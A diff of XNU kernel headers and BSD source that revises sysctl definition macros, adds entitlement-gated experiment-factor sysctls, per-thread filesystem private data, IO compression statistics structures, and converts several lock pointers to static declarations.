+       __SYSCTL_NODE(parent, nbr, name, access, handler, descr)
+
+#define SYSCTL_EXTENSIBLE_NODE(parent, nbr, name, access, handler, descr)       \
+       __SYSCTL_NODE(parent, nbr, name, access, handler, descr);               \
+       __SYSCTL_EXTENSION_NODE(parent##_##name)
+#else
 #define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
-       struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr); \
-       SYSCTL_LINKER_SET_ENTRY(__sysctl_set, sysctl_##parent##_##name)
+       __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)
 
 /* This constructs a node from which other oids can hang. */
-#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)              \
-       struct sysctl_oid_list sysctl_##parent##_##name##_children;         \
-       SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                  \
-                  (void*)&sysctl_##parent##_##name##_children, 0, handler, \
-                  "N", descr)
+#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)                  \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                      \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr)
+#endif /* XNU_KERNEL_PRIVATE */
 
 /* Oid for a string.  len can be 0 to indicate '\0' termination. */
 #define SYSCTL_STRING(parent, nbr, name, access, arg, len, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_STRING|access, \
-               arg, len, sysctl_handle_string, "A", descr)
+           arg, len, sysctl_handle_string, "A", descr)
 
 #define SYSCTL_COMPAT_INT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-              ptr, val, sysctl_handle_int, "I", descr)
+           ptr, val, sysctl_handle_int, "I", descr)
 
 #define SYSCTL_COMPAT_UINT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, val, sysctl_handle_int, "IU", descr)
+           ptr, val, sysctl_handle_int, "IU", descr)
 
 /* Oid for an int.  If ptr is NULL, val is returned. */
 #define SYSCTL_INT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-              ptr, val, sysctl_handle_int, "I", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int)) ? 0 : -1]
+           ptr, val, sysctl_handle_int, "I", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int), \
+           "must be integer sized");
 
 /* Oid for an unsigned int.  If ptr is NULL, val is returned. */
 #define SYSCTL_UINT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, val, sysctl_handle_int, "IU", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int)) ? 0 : -1]
+           ptr, val, sysctl_handle_int, "IU", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int), \
+           "must be integer sized");
 
 /* Oid for a long.  The pointer must be non NULL. */
 #define SYSCTL_LONG(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, 0, sysctl_handle_long, "L", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_long, "L", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long), \
+           "must be long sized");
 
 /* Oid for a unsigned long.  The pointer must be non NULL. */
 #define SYSCTL_ULONG(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, 0, sysctl_handle_long, "LU", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_long, "LU", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long), \
+           "must be long sized");
 
 /* Oid for a quad.  The pointer must be non NULL. */
 #define SYSCTL_QUAD(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_QUAD|access, \
-               ptr, 0, sysctl_handle_quad, "Q", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_quad, "Q", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long), \
+           "must be long long sized");
 
 /* Oid for an opaque object.  Specified by a pointer and a length. */
 #define SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, fmt, descr) \
@@ -402,8 +517,8 @@ __END_DECLS
 /* Oid for a struct.  Specified by a pointer and a type. */
 #define SYSCTL_STRUCT(parent, nbr, name, access, ptr, type, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_OPAQUE|access, \
-               ptr, sizeof(struct type), sysctl_handle_opaque, \
-               "S," #type, descr)
+           ptr, sizeof(struct type), sysctl_handle_opaque, \
+           "S," #type, descr)
 
 /*
  * Oid for a procedure.  Specified by a pointer and an arg.
@@ -412,8 +527,111 @@ __END_DECLS
  */
 #define SYSCTL_PROC(parent, nbr, name, access, ptr, arg, handler, fmt, descr) \
        SYSCTL_OID(parent, nbr, name, access, \
-               ptr, arg, handler, fmt, descr)
+           ptr, arg, handler, fmt, descr)
+
+/*
+ * The EXPERIMENT macros below expose values for on-device experimentation (A/B testing) via Trial.
+ * These values will be set shortly after boot by the KRExperiments framework based on any
+ * active experiments on the device.
+ * Values exposed via these macros are still normal sysctls and can be set by the superuser in the
+ * development or debug kernel. However, on the release kernel they can ONLY be set by processes
+ * with the com.apple.private.write-kr-experiment-factors entitlement.
+ * In addition, for numeric types, special macros are provided that enforce a valid range for the value (inclusive)
+ * to ensure that an errant experiment can't set a totally unexpected value. These macros also track which
+ * values have been modified via sycstl(3) so that they can be inspected with the showexperiments lldb macro.
+ */
+
+struct experiment_spec {
+       void *ptr; /* ptr to numeric experiment factor. */
+       uint64_t min_value; /* Min value that can be set via sysctl(3) (inclusive). */
+       uint64_t max_value; /* Max value that can be set via sysctl(3) (inclusive). */
+       uint64_t original_value; /* First value that was overwritten via sysctl(3). */
+       _Atomic bool modified; /* Has this value ever been overwritten via sysctl(3)? */
+};
+
+/*
+ * The handlers for the numeric types can be easily parameterized by type.
+ * So they're defined via an X macro.
+ */
+#define experiment_factor_numeric_types \
+    X(uint, unsigned int) \
+    X(int, int) \
+    X(ulong, unsigned long) \
+    X(long, long) \
+    X(uint64, uint64_t) \
+    X(int64, int64_t)
+
+#define X(experiment_factor_typename, _) \
+int experiment_factor_##experiment_factor_typename##_handler SYSCTL_HANDLER_ARGS;
+
+experiment_factor_numeric_types
+#undef X
+
+#define __EXPERIMENT_FACTOR_SPEC(parent, name, p, min, max) \
+       struct experiment_spec experiment_##parent##_##name = { \
+               .ptr = p, \
+               .min_value = min, \
+               .max_value = max, \
+               .original_value = 0, \
+               .modified = false \
+       }
+
+#define EXPERIMENT_FACTOR_UINT(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(unsigned int), "must be integer sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint_handler, "IU", descr);
+
+#define EXPERIMENT_FACTOR_INT(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(int), "must be integer sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int_handler, "I", descr);
+
+#define EXPERIMENT_FACTOR_ULONG(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(unsigned long), "must be long sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_ulong_handler, "LU", descr);
 
+#define EXPERIMENT_FACTOR_LONG(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(long), "must be long sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_long_handler, "L", descr);
+
+#define EXPERIMENT_FACTOR_UINT64(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(uint64_t), "must be 8 bytes"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint64_handler, "QU", descr);
+
+#define EXPERIMENT_FACTOR_INT64(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(int64_t), "must be 8 bytes"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int64_handler, "Q", descr);
+
+/*
+ * Calls an user provided handler to read / write this factor.
+ * Entitlement checking will still be done by sysctl, but it's the callers responsibility to validate any new values.
+ * This factor will not be printed out via the showexperiments lldb macro.
+ */
+#define EXPERIMENT_FACTOR_PROC(parent, name, access, ptr, arg, handler, fmt, descr) \
+       _Static_assert(arg != 1, "arg can not be 1") \
+       SYSCTL_PROC(parent, OID_AUTO, name, access | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, ptr, arg, handler, fmt, descr);
+
+#ifdef XNU_KERNEL_PRIVATE
+/*
+ * Sysctl handler for reading a simple counter.
+ * Using this directly is not recommended. Use the SYSCTL_SCALABLE_COUNTER macro
+ */
+int scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS;
+
+/*!
+ * @macro SYSCTL_SCALABLE_COUNTER
+ *
+ * @abstract
+ * Provides a sysctl for reading the value of a percpu counter.
+ */
+#define SYSCTL_SCALABLE_COUNTER(parent, name, counter, descr) \
+SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, \
+    (void *)(&counter), 0, &scalable_counter_sysctl_handler, "Q", descr);
+#endif /* XNU_KERNEL_PRIVATE */
 
 extern struct sysctl_oid_list sysctl__children;
 SYSCTL_DECL(_kern);
@@ -1172,16 +1390,8 @@ extern char     macosproductversion[];
 extern char     macosversion[];
 #endif
 
-struct linker_set;
-
-void    sysctl_register_set(const char *set);
-void    sysctl_unregister_set(const char *set);
 void    sysctl_mib_init(void);
-
-int sysctl_int(user_addr_t, size_t *, user_addr_t, size_t, int *);
-int sysctl_quad(user_addr_t, size_t *, user_addr_t, size_t, quad_t *);
-
-void sysctl_early_init(void);
+void    hvg_bsd_init(void);
 
 #endif /* BSD_KERNEL_PRIVATE */
 #else   /* !KERNEL */
index 8066c95f8cc7e01dcf3ba6ef0c511218bc19c9c5..ee460934be76559e4f6bbc6c4865f1e35e0595b6 100644 (file)
@@ -232,7 +232,8 @@ uint32_t throttle_lowpri_io(int sleep_amount);
 /* returns TRUE if the throttle_lowpri_io called with the same sleep_amount would've slept */
 int     throttle_lowpri_io_will_be_throttled(int sleep_amount);
 void    throttle_set_thread_io_policy(int policy);
-int             throttle_get_thread_effective_io_policy(void);
+int     throttle_get_thread_effective_io_policy(void);
+int     throttle_thread_io_tier_above_metadata(void);
 
 typedef struct __throttle_info_handle *throttle_info_handle_t;
 int     throttle_info_ref_by_mask(uint64_t throttle_mask, throttle_info_handle_t *throttle_info_handle);
index b849f3aeba16fe3b3a7dd8619cb7581da59f224b..2fdf66a4c2fdfbccab130d84ac4a760c7e2e66ef 100644 (file)
@@ -336,6 +336,11 @@ extern void ttyhold(struct tty *tp);
 
 #define PTS_MAJOR 4
 #define PTC_MAJOR 5
+/*
+ * If you need accounting consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_TTYS     KHEAP_DEFAULT
 #endif /* defined(XNU_KERNEL_PRIVATE) */
 
 __END_DECLS
index 50f97527a7f5153e1a542effccd86ab753086aa6..562a3e20eccbee71fc149f98865212e5b15e5ddb 100644 (file)
@@ -109,7 +109,7 @@ struct cs_blob {
        off_t           csb_end_offset;         /* Blob coverage area end, from csb_base_offset */
        vm_size_t       csb_mem_size;
        vm_offset_t     csb_mem_offset;
-       vm_address_t    csb_mem_kaddr;
+       void            * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_mem_kaddr") csb_mem_kaddr;
        unsigned char   csb_cdhash[CS_CDHASH_LEN];
        ptrauth_generic_signature_t csb_cdhash_signature;
        const struct cs_hash  *csb_hashtype;
@@ -125,6 +125,7 @@ struct cs_blob {
        char            * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_supplement_teamid") csb_supplement_teamid;
 #endif
        const CS_GenericBlob * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements_blob") csb_entitlements_blob;    /* raw blob, subrange of csb_mem_kaddr */
+       ptrauth_generic_signature_t csb_entitlements_blob_signature;
        void *          XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements") csb_entitlements;       /* The entitlements as an OSDictionary */
        unsigned int    csb_signer_type;
        unsigned int    csb_reconstituted;      /* signature has potentially been modified after validation */
index 08be2fc3ae852e6ab7d326ea0c570a58eb3db3c3..d1b3c1aaaad766b270e4b629fd0192f2d468b247 100644 (file)
@@ -107,6 +107,9 @@ struct ucred {
                uid_t   cr_ruid;        /* real user id */
                uid_t   cr_svuid;       /* saved user id */
                u_short cr_ngroups;     /* number of groups in advisory list */
+#if XNU_KERNEL_PRIVATE
+               u_short __cr_padding;
+#endif
                gid_t   cr_groups[NGROUPS];/* advisory group list */
                gid_t   cr_rgid;        /* real group id */
                gid_t   cr_svgid;       /* saved group id */
index 502aae89a82b8112aebe03c7d84ef6d54aeb852e..5867dcb2d474d997cab4ec963adf1063dad6796e 100644 (file)
@@ -68,6 +68,9 @@
 #include <sys/un.h>
 #include <sys/ucred.h>
 #include <sys/socketvar.h>
+#if !KERNEL && PRIVATE
+#include <TargetConditionals.h>
+#endif
 
 /*
  * Protocol control block for an active
@@ -204,7 +207,7 @@ struct  xunpcb {
        u_quad_t                        xu_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 
 struct xunpcb64_list_entry {
        u_int64_t   le_next;
@@ -238,7 +241,7 @@ struct xunpcb64 {
        struct xsocket64        xu_socket;
 };
 
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #pragma pack()
 
index 53fdcdb9426907ff4acf08d1b893d26db96ac39c..9a2934f4ed5d5520b446d5512e91a354c485b222 100644 (file)
@@ -332,6 +332,9 @@ struct uthread {
        /* Document Tracking struct used to track a "tombstone" for a document */
        struct doc_tombstone *t_tombstone;
 
+       /* Field to be used by filesystems */
+       uint64_t t_fs_private;
+
        struct os_reason *uu_exit_reason;
 };
 
index 0ae525055ae1c2b26ca3f3afe60891a2fab5bf5b..aa0cd6aa465133a952d01e42f207454596745b0b 100644 (file)
@@ -70,7 +70,9 @@
 #include <sys/kernel_types.h>
 #include <sys/param.h>
 #include <sys/signal.h>
-#endif
+#else
+#include <stdint.h>
+#endif /* KERNEL */
 
 /*
  * The vnode is the focus of all file activity in UNIX.  There is a
@@ -1513,6 +1515,30 @@ int     vfs_ctx_skipatime(vfs_context_t ctx);
 
 #endif
 
+/* Supported filesystem tags for vfs_[set|get]_thread_fs_private */
+#define FS_PRIVATE_TAG_APFS (1)
+
+/*!
+ *  @function vfs_set_thread_fs_private
+ *  @abstract Set the per-thread filesystem private data field.
+ *  @discussion Allows a filesystem to store an implementation specific value in the thread struct.
+ *  Note that this field is common to all filesystems thus re-entrancy should be taken into consideration.
+ *  @param tag Filesystem identification tag.
+ *  @param fs_private The value to be set.
+ *  @return 0 for success, ENOTSUP if the filesystem tag is not supported.
+ */
+int vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private);
+
+/*!
+ *  @function vfs_get_thread_fs_private
+ *  @abstract Return the per-thread filesystem private data field.
+ *  @discussion Returns the per-thread value that was set by vfs_set_thread_fs_private().
+ *  @param tag Filesystem identification tag.
+ *  @param fs_private The stored per-thread value.
+ *  @return 0 for success, ENOTSUP if the filesystem tag is not supported.
+ */
+int vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private);
+
 /*!
  *  @function vflush
  *  @abstract Reclaim the vnodes associated with a mount.
@@ -2421,6 +2447,9 @@ vnode_t vfs_context_get_cwd(vfs_context_t); /* get cwd with iocount */
 int vnode_isnoflush(vnode_t);
 void vnode_setnoflush(vnode_t);
 void vnode_clearnoflush(vnode_t);
+#if CONFIG_IO_COMPRESSION_STATS
+void vnode_iocs_record_and_free(vnode_t);
+#endif /* CONFIG_IO_COMPRESSION_STATS */
 
 #define BUILDPATH_NO_FS_ENTER     0x1 /* Use cache values, do not enter file system */
 #define BUILDPATH_CHECKACCESS     0x2 /* Check if parents have search rights */
@@ -2439,4 +2468,34 @@ __END_DECLS
 
 #endif /* KERNEL */
 
+/*
+ * Structure for vnode level IO compression stats
+ */
+
+#define IOCS_BUFFER_NUM_SIZE_BUCKETS         10
+#define IOCS_BUFFER_MAX_BUCKET               9
+#define IOCS_BUFFER_NUM_COMPRESSION_BUCKETS  7
+#define IOCS_BLOCK_NUM_SIZE_BUCKETS          16
+
+struct io_compression_stats {
+       uint64_t uncompressed_size;
+       uint64_t compressed_size;
+       uint32_t buffer_size_compression_dist[IOCS_BUFFER_NUM_SIZE_BUCKETS][IOCS_BUFFER_NUM_COMPRESSION_BUCKETS];
+       uint32_t block_compressed_size_dist[IOCS_BLOCK_NUM_SIZE_BUCKETS];
+};
+typedef struct io_compression_stats *io_compression_stats_t;
+
+#define IOCS_SBE_PATH_LEN             128
+#define IOCS_PATH_START_BYTES_TO_COPY 108
+#define IOCS_PATH_END_BYTES_TO_COPY   20 /* Includes null termination */
+
+#define IOCS_SYSCTL_LIVE                  0x00000001
+#define IOCS_SYSCTL_STORE_BUFFER_RD_ONLY  0x00000002
+#define IOCS_SYSCTL_STORE_BUFFER_MARK     0x00000004
+
+struct iocs_store_buffer_entry {
+       char     path_name[IOCS_SBE_PATH_LEN];
+       struct io_compression_stats iocs;
+};
+
 #endif /* !_VNODE_H_ */
index a25c11c3e36f3f63b81de0c6761f16a0d52d5c30..4af412789330f2d9743d99dccbd2bbfaea3d7b17 100644 (file)
@@ -121,7 +121,7 @@ typedef struct vnode_resolve *vnode_resolve_t;
  * v_freelist is locked by the global vnode_list_lock
  * v_mntvnodes is locked by the mount_lock
  * v_nclinks and v_ncchildren are protected by the global name_cache_lock
- * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtxp
+ * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtx
  * the rest of the structure is protected by the vnode_lock
  */
 struct vnode {
@@ -184,6 +184,9 @@ struct vnode {
                                                 *  if VFLINKTARGET is set, if  VFLINKTARGET is not
                                                 *  set, points to target */
 #endif /* CONFIG_FIRMLINKS */
+#if CONFIG_IO_COMPRESSION_STATS
+       io_compression_stats_t io_compression_stats;            /* IO compression statistics */
+#endif /* CONFIG_IO_COMPRESSION_STATS */
 };
 
 #define v_mountedhere   v_un.vu_mountedhere
@@ -621,6 +624,19 @@ int     vnode_isinuse_locked(vnode_t, int, int );
 
 #endif /* BSD_KERNEL_PRIVATE */
 
+#if CONFIG_IO_COMPRESSION_STATS
+/*
+ * update the IO compression stats tracked at block granularity
+ */
+int vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket);
+
+/*
+ * update the IO compression stats tracked for the buffer
+ */
+int vnode_updateiocompressionbufferstats(vnode_t vp, uint64_t uncompressed_size, uint64_t compressed_size, uint32_t size_bucket, uint32_t compression_bucket);
+
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
 extern bool rootvp_is_ssd;
 
 #endif /* !_SYS_VNODE_INTERNAL_H_ */
index 48049016ffa59246756e18442d5a3e594e58eeea..c38709f5bfb23bfbfa07dc7156923307bfe2cd22 100644 (file)
@@ -56,11 +56,8 @@ struct vsockpcb {
 
 struct vsockpcbinfo {
        // PCB locking.
-       lck_attr_t *vsock_lock_attr;
-       lck_grp_t *vsock_lock_grp;
-       lck_grp_attr_t *vsock_lock_grp_attr;
-       lck_rw_t *all_lock;
-       lck_rw_t *bound_lock;
+       lck_rw_t all_lock;
+       lck_rw_t bound_lock;
        // PCB lists.
        TAILQ_HEAD(, vsockpcb) all;
        LIST_HEAD(, vsockpcb) bound;
index 91567cf8359f21840085c42ef3b4455cb5855452..b4d04f87b45767480eccda642924d6effe432ed1 100644 (file)
@@ -154,6 +154,10 @@ __BEGIN_DECLS
 /* Kernel-supplied flag: Work interval has been ignored by the kernel */
 #define WORK_INTERVAL_FLAG_IGNORED                      (0x20)
 
+/* Specifies that the work interval requests the system to provide just enough performance
+ * to be able to finish at the provided deadline and no sooner. */
+#define WORK_INTERVAL_FLAG_FINISH_AT_DEADLINE           (0x40)
+
 /* Flags to describe the interval flavor to the performance controller */
 #define WORK_INTERVAL_TYPE_MASK                 (0xF0000000)
 #define WORK_INTERVAL_TYPE_DEFAULT              (0x0 << 28)
@@ -163,6 +167,7 @@ __BEGIN_DECLS
 #define WORK_INTERVAL_TYPE_CA_CLIENT            (0x3 << 28)
 #define WORK_INTERVAL_TYPE_HID_DELIVERY         (0x4 << 28)
 #define WORK_INTERVAL_TYPE_COREMEDIA            (0x5 << 28)
+#define WORK_INTERVAL_TYPE_ARKIT                (0x6 << 28)
 #define WORK_INTERVAL_TYPE_LAST                 (0xF << 28)
 
 #ifndef KERNEL
index 6444ea6f49f072ddb8244691175b77637ae99c32..bab6520e7338c51e58c40684fb6f1af8af73d3c3 100644 (file)
@@ -196,9 +196,11 @@ __API_AVAILABLE(macos(10.15), ios(13), tvos(13), watchos(6));
 #define MACH_BRIDGE_OBSV_RATE   0x7     /* out of range observed rates */
 
 /* DBG_SKYWALK has same toplevel code as DBG_DLIL, so don't reuse subcodes */
+#define DBG_SKYWALK_ALWAYSON    0x10
 #define DBG_SKYWALK_FLOWSWITCH  0x11
 #define DBG_SKYWALK_NETIF       0x12
 #define DBG_SKYWALK_CHANNEL     0x13
+#define DBG_SKYWALK_PACKET      0x14
 
 #define PPT_TEST            0x01
 #define PPT_JETSAM_HIWAT    0x02
index debde98cf4961eb8fb73bc49542b11ac4a79ae24..cdb70d82165408ead52ad5a78fa44e0582f16d33 100644 (file)
@@ -69,6 +69,7 @@ struct xnupost_test bsd_post_tests[] = {
 #ifdef __arm64__
        XNUPOST_TEST_CONFIG_BASIC(arm64_lock_test),
 #endif
+#if !KASAN // <rdar://71151361>
 #if defined(__arm__) || defined(__arm64__)
        XNUPOST_TEST_CONFIG_BASIC(pmap_test),
 #endif /* defined(__arm__) || defined(__arm64__) */
@@ -78,12 +79,15 @@ struct xnupost_test bsd_post_tests[] = {
 #if __ARM_PAN_AVAILABLE__
        XNUPOST_TEST_CONFIG_BASIC(arm64_late_pan_test),
 #endif
+#endif /* !KASAN */
        XNUPOST_TEST_CONFIG_BASIC(kalloc_test),
        XNUPOST_TEST_CONFIG_BASIC(ipi_test),
 #if HAS_TWO_STAGE_SPR_LOCK
        XNUPOST_TEST_CONFIG_BASIC(arm64_spr_lock_test),
 #endif
+#if !KASAN
        XNUPOST_TEST_CONFIG_BASIC(copyio_test),
+#endif /* KASAN */
 };
 
 uint32_t bsd_post_tests_count = sizeof(bsd_post_tests) / sizeof(xnupost_test_data_t);
index 0b4f7a6285050c10b7993e43c3008ceb7f16805d..3efc8573649267ffb40bdba56c16cbfd0176a821 100644 (file)
@@ -145,7 +145,7 @@ static void xattrfile_setattr(vnode_t dvp, const char * basename,
     struct vnode_attr * vap, vfs_context_t ctx);
 #endif /* CONFIG_APPLEDOUBLE */
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 static errno_t post_rename(vnode_t fdvp, vnode_t fvp, vnode_t tdvp, vnode_t tvp);
 
@@ -1525,6 +1525,36 @@ vfs_context_bind(vfs_context_t ctx)
        return 0;
 }
 
+int
+vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private)
+{
+       struct uthread *ut;
+
+       if (tag != FS_PRIVATE_TAG_APFS) {
+               return ENOTSUP;
+       }
+
+       ut = get_bsdthread_info(current_thread());
+       ut->t_fs_private = fs_private;
+
+       return 0;
+}
+
+int
+vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private)
+{
+       struct uthread *ut;
+
+       if (tag != FS_PRIVATE_TAG_APFS) {
+               return ENOTSUP;
+       }
+
+       ut = get_bsdthread_info(current_thread());
+       *fs_private = ut->t_fs_private;
+
+       return 0;
+}
+
 int
 vfs_isswapmount(mount_t mnt)
 {
@@ -1567,9 +1597,9 @@ vfs_rootvnode(void)
 {
        int error;
 
-       lck_rw_lock_shared(rootvnode_rw_lock);
+       lck_rw_lock_shared(&rootvnode_rw_lock);
        error = vnode_get(rootvnode);
-       lck_rw_unlock_shared(rootvnode_rw_lock);
+       lck_rw_unlock_shared(&rootvnode_rw_lock);
        if (error) {
                return (vnode_t)0;
        } else {
index 6f3b17ae61a18744b1363b7c7cf70a0807236ae8..b9bd4bb4cbd34f8ea16269d2c8fd112458189e93 100644 (file)
@@ -167,12 +167,11 @@ static TAILQ_HEAD(bqueues, buf) bufqueues[BQUEUES];
 static int needbuffer;
 static int need_iobuffer;
 
-static lck_grp_t        *buf_mtx_grp;
-static lck_attr_t       *buf_mtx_attr;
-static lck_grp_attr_t   *buf_mtx_grp_attr;
-static lck_mtx_t        *iobuffer_mtxp;
-static lck_mtx_t        *buf_mtxp;
-static lck_mtx_t        *buf_gc_callout;
+static LCK_GRP_DECLARE(buf_mtx_grp, "buffer cache");
+static LCK_ATTR_DECLARE(buf_mtx_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(iobuffer_mtxp, &buf_mtx_grp, &buf_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(buf_mtx, &buf_mtx_grp, &buf_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(buf_gc_callout, &buf_mtx_grp, &buf_mtx_attr);
 
 static uint32_t buf_busycount;
 
@@ -286,7 +285,7 @@ bremhash(buf_t  bp)
 }
 
 /*
- * buf_mtxp held.
+ * buf_mtx held.
  */
 static __inline__ void
 bmovelaundry(buf_t bp)
@@ -609,6 +608,21 @@ bufattr_ioscheduled(bufattr_t bap)
        return 0;
 }
 
+void
+bufattr_markexpeditedmeta(bufattr_t bap)
+{
+       SET(bap->ba_flags, BA_EXPEDITED_META_IO);
+}
+
+int
+bufattr_expeditedmeta(bufattr_t bap)
+{
+       if ((bap->ba_flags & BA_EXPEDITED_META_IO)) {
+               return 1;
+       }
+       return 0;
+}
+
 errno_t
 buf_error(buf_t bp)
 {
@@ -896,7 +910,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st
                }
                *(buf_t *)(&io_bp->b_orig) = bp;
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                io_bp->b_lflags |= BL_SHADOW;
                io_bp->b_shadow = bp->b_shadow;
@@ -910,7 +924,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st
                        bp->b_data_ref++;
                }
 #endif
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
        } else {
                if (external_storage) {
 #ifdef BUF_MAKE_PRIVATE
@@ -956,7 +970,7 @@ buf_make_private(buf_t bp)
 
        bcopy((caddr_t)bp->b_datap, (caddr_t)my_buf.b_datap, bp->b_bcount);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (t_bp = bp->b_shadow; t_bp; t_bp = t_bp->b_shadow) {
                if (!ISSET(bp->b_lflags, BL_EXTERNAL)) {
@@ -974,7 +988,7 @@ buf_make_private(buf_t bp)
        }
 
